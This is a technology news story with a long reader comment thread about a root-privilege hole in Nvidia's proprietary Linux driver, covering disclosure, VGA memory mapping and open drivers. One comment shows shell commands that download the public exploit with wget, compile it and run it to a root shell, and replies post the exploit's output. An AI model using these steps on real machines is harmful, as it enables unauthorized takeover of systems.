Proprietary Nvidia Linux Driver Contains Privilege Escalation Hole

An anonymous reader writes "The Nvidia binary driver has been exploited by an anonymous hacker, who reported it to nvidia months ago and it was never fixed. Now the exploit was made public." The one releasing the exploit (relayed to him anonymously) is David Arlie, well known X hacker. The bug lets the attacker write to any part of memory on the system by shifting the VGA window; the attached exploit uses this to attain superuser privileges. It appears that this has been known to Nvidia for at least a month.

Use Windows | +5 Insightful

[h910]

Use Windows and you don't get linux malware. True story, mod +5 true accordingly.

Re:Use Windows | +5 Insightful

[broginator]

That's like saying "Drive Fords, that way you won't crash in a Chevy."

Re:Use Windows | +5 Insightful

[Tapewolf]

Use Windows and you don't get linux malware. True story, mod +5 true accordingly.

Since Nvidia's drivers share a large amount of common code, I'd say it's only a matter of time.

A view to a kill.

Shouldn't the VGA window be a window into the video memory, or at least configuration registers?

Re:A view to a kill.

[greg1104]

VGA maps the video card's memory into the regular CPU address space so that applications can read and write directly to it. That's the VGA window being referenced here. Removing that is further complicated by waiting to retain compatibility with older video standards (CGA, EGA).

Re:A view to a kill.

[causality]

Removing that is further complicated by waiting to retain compatibility with older video standards (CGA, EGA).

... that nobody uses anymore, at least not with PC hardware.

Re:A view to a kill.

Is this due to a very old code base in the windows driver, and the driver code being shared between both linux and windows? Compatibility makes sense if you are running DOS or allowing DOS apps to function (or maybe 16-bit windows). But I very much doubt Monochrome, CGA, EGA, and some of the old VGA standard works at all in modern windows, and definitely not in linux.

This should never have been exposed to the user in linux and hopefully not in windows either. And if compatibility is a concern, then it should be through emulation and a protected path if hardware access is useful.

Re:A view to a kill.

[Desler]

Windows 7 still includes a VGA video driver.

Re:A view to a kill.

[The+MAZZTer]

Guess what, your computers boots right into 16-color text mode (used by the BIOS and sometimes by Windows as part of the boot sequence) using EGA colors. Not sure if that's relevant but it might be. Linux might also use something similar for its boot process and for Ctrl+Alt+Fn terminals.

Re:A view to a kill.

[rjr162]

That it does. Reimaged a dell e6240 laptop using IBM's tavoli system manager the other week, and it apparently failed at some point. Everything installed and worked except the one video driver.
These laptops can use the built in intel video for battery savings and switch over to a build in nvidia "card" when more grunt is needed. The issue was the laptop wouldn't output video to an external monitor. I checked in device manager and the nvidia card was listed as it should be, but the intel video was listed as "generic VGA" which still allowed video to display on the laptop screen but didn't have the ability to work with an external monitor.

Re:A view to a kill.

[MightyMartian]

So how does Windows deal with restricting where this window can be remapped?

Re:A view to a kill.

[greg1104]

VGA works fine in Windows and in Linux. See Linux framebuffer as a relatively modern implementation. (I say relatively modern because I'd been using Linux for a long time before it was added, and it's new compared to things like X-Windows) PC hardware is certainly not so abstracted away by useful APIs that the drivers can ignore this level of detail, to be protected from them. Manipulating this sort of thing is exactly what a driver is written to do.

Your suggestion that this shouldn't have been exposed to the user is missing the point: this is an exploit. The driver itself needs to know all these details to properly initialize itself and support old-school text/VGA modes during boot. The user was likely never intended to have access to them, but an exploit isn't limited to what the user is supposed to do. Whether or not the path is protected or not is irrelevant if the path is bypassed.

Re:A view to a kill.

[h4rr4r]

Does the Nvidia driver even support KMS?

Re:A view to a kill.

[causality]

Guess what, your computers boots right into 16-color text mode (used by the BIOS and sometimes by Windows as part of the boot sequence) using EGA colors. Not sure if that's relevant but it might be. Linux might also use something similar for its boot process and for Ctrl+Alt+Fn terminals.

Yes. When it does that, the OS has not yet loaded. Hell, the boot loader (GRUB in my case) has not yet loaded.

It's obviously implemented in hardware. That means it has nothing to do with the nVidia driver that my OS loads up and whether that nVidia driver supports EGA.

So okay, I'll rephrase my previous comment from "nobody uses it" to "no one needs the nVidia driver to provide it".

Hoooo boy...

[Tarlus]

With all the recent controversy and Linus and other members of the FOSS community flipping Nvidia the bird over the issue of keeping their driver closed, they're certainly going to take this news and run with it.

Re:Hoooo boy...

Correct. That's why i choose AMD.

Not that they're that much better, but at least they tried to.

Re:Hoooo boy...

Nvidia's future is going to be determined almost entirely on success or failure of the Tegra line, which will predominantly run Android. That's why Linus flipped them the bird. Nvidia, as a company, is becoming increasingly dependent upon Linux to succeed financially. Yet they are not making any effort to engage developers or the community at large.

Re:Hoooo boy...

[rtfa-troll]

. 90+% of Nvidia's customers don't use FOSS at all.

That may be true, for all I know or care but it's not for want of trying. As their traditional desktop market is dissapearing into irrelevance, with Apple having already decided to skip Nvidia they are desperate to get into the Android market and without that they are in deep trouble.

There is a real reason why their PR people were out in force in response to Linuses recent commends and if I were investing, the fact that they failed to get traction with the community would mean I would be moving my money out of Nvidia.

Open Source Advantage

[Nerdfest]

I'd like to say that this would not have happened with an open source driver, but that's not necessarily true. It would almost definitely have been patched by now though.

Re:Open Source Advantage

[Dagger2]

Clearly the proprietary driver is much better then, since it allows me to do whatever I like with your computer.

Re:Who did he send it to at Nvidia?

Maybe people need to stop being apologists for this kind of thing...

Companies don't just hand out the email address for the head of their SW development division; maybe if they did we could them let the right people know. I emailed a random Joe when I found an issue with a site, and it got escalated up and it got fixed.

Maybe if Nvidia had better quality random Joe's, when this sort of stuff did pass by them it would get escalated and not deleted.

Nvidia rotten to the core

[Jerry+Atrick]

Nvidia are just serial fuckups. Wasted half my saturday trying to find a driver release that would work on my wifes Kubuntu 11 PC. Eventually gave in and upgraded to 12.04 instead of manually erasing the broken install yet again... to find another fscking broken driver and no X. These idiots are completely incompetent and simply don't respond to error reports or much of anything else from ordinary users.

Nvidia, still haven't forgotten all the accelerated functions in your chipsets that gradually got turned of as drivers updated, because the hardware was rotten to the core and couldn't be made to work. Or the ongoing multi year saga of begging for working PAL TV support, all of it falling on deaf ears. Or the magically vanished TV out support when Vista shipped.

Frankly a root exploit is one of their lesser sins.

Re:Nvidia rotten to the core

Seriously? This is the kind of shit that makes people hate us Linux users. "Oh, you had a problem? Should have used $MY_FAVORITE_DISTRO then it would have worked! (Unless it still didn't, but let's just ignore that possibility so I can be a smug bastard.)"

Re:Nvidia rotten to the core

[Jerry+Atrick]

Frankly a root exploit is one of their lesser sins.

Then their cardinal sins must be Hitlerian; (from David Arlie's write-up)

You forget the episodes like their broken hardware accelerated NIC, that dropped random bits.

First the spent months claiming there was no bug.
Then they spent months claiming they'd fixed it (they hadn't).
Then they claimed they'd fixed it when they'd actually just disabled the acceleration and fallen back to software!

Over a year of data loss for anyone that believed them.

Same thing happened with their attempt at accelerated sound hardware. And pretty much everything else they've tried accelerating apart from GPUs. GPUs have a whole different class of problems to do with not listening to feedback.

Re:Nvidia rotten to the core

[fuzzyfuzzyfungus]

Somebody should probably tell Nvidia that a driver that enables arbitrary memory read/write could probably be used as a DRM circumvention mechanism if targeted at a 'protected' program rather than the kernel. That might actually get them to fix it...

Re:Nvidia rotten to the core

[hobarrera]

His advice makes sense.
You bought hardware from a company unwilling to document it's hardware and unwilling to release it's drivers, installed a distro that opts for FLOSS drivers, and then compained the combination didn't work. Of course it didn't, you can't just have ANY software run with ANY hardware perfectly as you expect it to.

Re:Nvidia rotten to the core

[gl4ss]

haha, that's a fucking classic.

makes me laugh almost as hard as believing that I'd get video decoding support in gpu when I bought a gf 6800 back in the day(you know, because it said so on the box). "In late 2005, an update to Nvidia's website finally confirmed what had long been suspected by the user community: WMV-acceleration is not available on the AGP 6800. Of course, today's standard computers are fast enough to play WMV9 video and other sophisticated codecs like MPEG-4, H.264 or Theora without hardware acceleration." (I'm just kidding, I didn't believe them to have actually working acceleration for video decode when I bought them, I did however think that they'd get it sorted out in the drivers for some random video player program to use.. never happened).

Re:Nvidia rotten to the core

Oh, please!

I've re-written the installers for NVidia's binary blobs and library mangling several times, and sent the fixes to NVidia. The problem is that the installer moves aside the existing OpenGL libraries and crates symlinks to their *own* proprietary libraries, and doesn't inform the local package management system of the change. So updates break it, and the installer gets very confused if you try to run it with a new installer and haven't cleared the old installer.

Cleaning up after the resulting mess is awkward, unless someone has thoughtfully bundled it for you into some more sane package. And that's a lot of work to fix something that NVidia keeps breaking in new and creative ways with very, very bad shell scripting.

Re:Nvidia rotten to the core

[Carewolf]

I think they might have a culture of not listening. The chief maintainer of nvidia's official forums, posted after Linus outburst a series of post about how Linus complaints had cause "him and his family severe grief", and that Linus should shut up, and would not be welcome on the forum, and that anybody talking about his comments would be banned.

Jesus christ, that guy needs serious help, but it might be an institutional problem. Maybe they are taught that any complaints about Nvidia are actually mortal stains on their honour as employees of Nvidia??

Re:Nvidia rotten to the core

[chmod+a+x+mojo]

Who the FUCK modded you Insightful?

Sonovabitch why to the retards ALWAYS come out the one day I don't have mod points?

works here

It's certainly legit..

c@v:~$
c@v:~$ wget http://cache.gmane.org//gmane/comp/security/full-disclosure/86747-001.bin ...
2012-08-01 12:46:13 (60.8 KB/s) - `86747-001.bin' saved [18225/18225] ...
c@v:~$ mv 86747-001.bin nvid-root.c
c@v:~$ gcc nvid-root.c -o nvid-root
c@v:~$ ./nvid-root
[*] IDT offset at 0xc1808000
[*] Abusing nVidia...
[*] CVE-2012-YYYY
[*] 32-bits Kernel found at ofs 0
[*] Using IDT entry: 220 (0xc18086e0)
[*] Enhancing gate entry...
[*] Triggering payload...
[*] Hiding evidence...
[*] Have root, will travel..
sh-4.2#
sh-4.2#

sh-4.2# id
uid=0(root) gid=0(root) groups=0(root),4(adm),6(disk),20(dialout),24(cdrom),29(audio),44(video),46(plugdev),104(fuse),105(lpadmin),115(admin),116(sambashare),119(pulse-access),1000(chad)
sh-4.2#

sh-4.2# lsb_release -a
LSB Version: core-2.0-ia32:core-2.0-noarch:core-3.0-ia32:core-3.0-noarch:core-3.1-ia32:core-3.1-noarch:core-3.2-ia32:core-3.2-noarch:core-4.0-ia32:core-4.0-noarch
Distributor ID: Ubuntu
Description: Ubuntu 12.04 LTS
Release: 12.04
Codename: precise

sh-4.2# uname -a
Linux vero 3.2.0-24-generic-pae #39-Ubuntu SMP Mon May 21 18:54:21 UTC 2012 i686 i686 i386 GNU/Linux
sh-4.2#

Re:works here

[dmitrygr]

64-bit 2.6.38.8 kernel with nvidia driver 280.13 doesn't work:

[*] IDT offset at 0xffffffff81b60000
[*] Abusing nVidia...
[*] CVE-2012-YYYY
[*] 64-bits Kernel found at ofs 0
[*] Using IDT entry: 220 (0xffffffff81b60dc0)
[*] Enhancing gate entry...
[*] Triggering payload...
[*] Hiding evidence...
callsetroot returned fffffffffffffffe (-2)
[*] Failed to get root.

Re:works here

[Ken_g6]

Doesn't work for me on Linux Mint Debian Edition with Xfce, nVidia driver version x86_64-290.10:

uname -a | sed -e 's/^[^0-9]*//'
3.2.0-2-amd64 #1 SMP Sun Mar 4 22:48:17 UTC 2012 x86_64 GNU/Linux

lsb_release -a
LSB Version: core-2.0-amd64:core-2.0-noarch:core-3.0-amd64:core-3.0-noarch:core-3.1-amd64:core-3.1-noarch:core-3.2-amd64:core-3.2-noarch
Distributor ID: LinuxMint
Description: Linux Mint Xfce Edition
Release: 1
Codename: debian

./nvid-root
[*] IDT offset at 0xffffffff8172a000
[*] Abusing nVidia...
[*] CVE-2012-YYYY
[*] 64-bits Kernel found at ofs 0
[*] Using IDT entry: 220 (0xffffffff8172adc0)
[*] Enhancing gate entry...
[*] Triggering payload...
Killed

Message from syslogd@qcomp at Aug 1 12:30:52 ...
  kernel:[148805.500504] Oops: 0000 [#1] SMP

Message from syslogd@qcomp at Aug 1 12:30:52 ...
  kernel:[148805.500641] Stack:

Message from syslogd@qcomp at Aug 1 12:30:52 ...
  kernel:[148805.500658] Call Trace:

Message from syslogd@qcomp at Aug 1 12:30:52 ...
  kernel:[148805.500675] Code: Bad RIP value.

Message from syslogd@qcomp at Aug 1 12:30:52 ...
  kernel:[148805.500684] CR2: ffffffff81a00000

Re:works here

[fnj]

Why not; SELinux certainly has no problem blocking anything useful from working.

Re:Who did he send it to at Nvidia?

[nedlohs]

Yeah you don't get more flimsy evidence than a working exploit.

Re:Who did he send it to at Nvidia?

[ZeroSumHappiness]

If you're not surprised then I hope it's because you expect Nvidia to be shite. Microsoft, as policy (though possibly not practice), fully evaluates any possible security exploits submitted because they assume that among the cranks who've already broken through the airlock there might be a real security exploit. This is expensive but necessary. If Nvidia can't do the same then I'll have to seriously consider my choices next time I'm buying a card.

meh

[ThorGod]

Not too long ago Intel had a firmware exploit in their processors.

I still appreciate the effort Nvidia's made to support their cards on OSes such as linux and BSD over the years. I'll still only EVER buy nvidia cards because of their driver support.

Here's hoping they keep trucking along at it, even with what Linus' said and now this.

Re:Again?

[TheRaven64]

They have security vulnerabilities fairly regularly. Ones that are remotely exploitable are rarer, but the cited one from the grandparent was first known in 2004, not fixed until 2006, and allowed someone to anyone who could make you display an image (e.g. in a web page) run arbitrary code in your kernel. It gets cited a lot because it's a perfect case study in stunningly incompetent security.

For limited values of "you"

It needs a local execution method (either another exploit or a tricked user) and access to /dev/nvidia0.

So, for example, even if you exploit a web service to execute this on a suitable machine, you still won't get anything as long as web service's user doesn't have permissions on /dev/nvidia0.

Worst of all, it still needs downloading and compiling sources. WTF, Linux? When are we going to get all the software available prepackaged and regularly updated from the repository? Other OSes handle it well, no need for "wget && patch && gcc" to get this working, no need for sudo and sometimes even no need for any actions from user AT ALL, simply visit a page and it just works!

Re:For limited values of "you"

[Nerdfest]

When are we going to get all the software available prepackaged and regularly updated from the repository?

That's a fairly half-hearted troll. Most Linux distros have package management and multi-source software repositories that make iOS, Metro, and OS X look like the limited attempts at platform lock-in that they really are.

Re:For limited values of "you"

[Bert64]

Well, the presence of a local escalation hole makes other vulnerabilities more serious... Just some of the possible scenarios:

An HPC cluster with multiple non root users, could exploit this to get root...
Someone using linux as a workstation, exploited via a userland hole (eg browser bug), this nullifies the advantage of running as an unprivileged user.

Sure it's not as serious as a remote root hole, but it can still be a useful hole for a hacker.

Re:I'll take my chances

[konaya]

Or better yet: nVidia could actually make their driver open source. That way, we'll have all the bells and whistles, and when a security flaw gets known the community can patch it without nVidia's involvement.

Re:Who did he send it to at Nvidia?

[ZeroSumHappiness]

I didn't say Windows was perfect, just that if you send a (crank) security exploit to Microsoft they review it. They may not fix it. They may say the best that you can do is upgrade, but they know whether or not it's a real hole. (At least, that's the policy.)

One of many

[jandrese]

The graphics driver is both monstrously large and operates at a very low level, there are going to be tons and tons of security problems with it when people start seriously looking at it. As John Carmak put it: I agree with Microsoft’s assessment that WebGL is a severe security risk. The gfx driver culture is not the culture of security.

Nope

[FranTaylor]

TwinView doesn't work in nouveau

Re:Nope

[nullchar]

Correct, as TwinView is proprietary nvidia, but Xinerama should work fine.

Put the whole driver on the video card!

[FranTaylor]

There's plenty of horsepower on the card

Platform-agnostic api, super-duper-thin wrapper libaries

It also solves all the whinging about binary blobs

Re:I'll take my chances

[Desler]

So you're going to foot the legal bills for auditing all the source for copyrights and patents, plus pay for all the costs associated with rewriting any and all licensed code that won't allowed to be open sourced, and finally finance all the extra work needed to make it into mainline? You realize it's not as simple for NVIDIA as creating a public git repo and uploading the source code, right?

Should probably post to the support foru- oh, wait

[ExecutorElassus]

Perhaps not entirely coincidentally, "one month" is about the amount of time that nVidia's web forum - comically also the only route for reporting bugs, and found here - has been shut down due to a DDoS attack.

Probably not the best way to follow up their snippy response to Linus Torvald bashing their Linux support.

Re:Who did he send it to at Nvidia?

[RedDeadThumb]

Amen! I had a hell of a time trying to report a bug in the ATI driver as well. And how do you report a bug to netflix? All company web front pages should have big button that says "report bug". People are out here doing free QA for them and they aren't taking advantage. Plus I actually get pissed when I cannot report a bug. And I know I am not alone here, so it is bad PR.

They never even replied.

[pavon]

Yeah, one month can be pretty short notice to actually fix, test, and release some more complicated bugs. But in this cas,e Nvidia never even responded to people who notified them of the exploit. If I reported a security hole and they acknowledged it and let me know the were working on fixing it, then I would give them far more than a month to fix it. But if they just ignored me, then I'd release it after a month too.

Re:distro wars or idiot vs adept.

[OrangeTide]

Some distros try to simplify things for the user, but get it wrong. Feel free to complain to Canonical. They are the ones trying to beat a new path away from the rest of us. This stuff Just Works on Debian, the closest thing to Ubuntu.

ps - is a PC assembled from parts from 30+ vendors and at least 4 different firmware vendors really "a basic piece of hardware" ?